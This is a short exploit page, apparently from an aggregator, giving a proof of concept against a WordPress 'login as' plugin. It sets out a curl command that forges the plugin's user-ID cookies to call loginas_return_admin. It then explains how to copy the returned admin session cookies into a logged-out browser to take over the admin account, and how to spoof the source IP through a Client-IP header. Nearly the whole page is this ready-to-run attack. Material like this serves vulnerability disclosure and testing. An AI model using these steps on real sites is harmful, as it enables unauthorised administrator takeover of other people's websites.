Share
## https://sploitus.com/exploit?id=WPEX-ID:96B93253-31D0-4184-94B7-F1E18355D841
1. As an admin, log in as some user. Note the user ID.
2. Run the following `curl` command, filling in the `ADMIN_ID` and the `USER_ID`:
    
    ```
    curl -v https://example.com/wp-admin/admin-ajax.php -H 'Cookie: wordpress_test_cookie=WP%20Cookie%20check; wploginas_new_user_id=USER_ID; loginas_old_user_id=ADMIN_ID' -d 'action=loginas_return_admin'
    ```
    - Note that this `curl` command has to come from the same IP address as the Admin originally used to switch to the user. The attacker may use the `Client-IP` header to fake their IP address if needed.

3. In the response, note the final `Set-Cookie` headers setting the `wordpress_sec_...` and `wordpress_logged_in_...` cookies (note that these cookies may be different if you are using `http` instead of `https`.
4. In your browser console in a logged-out tab, manually set those two cookies.
5. Visit `/wp-admin` and see that you are logged in as the admin user.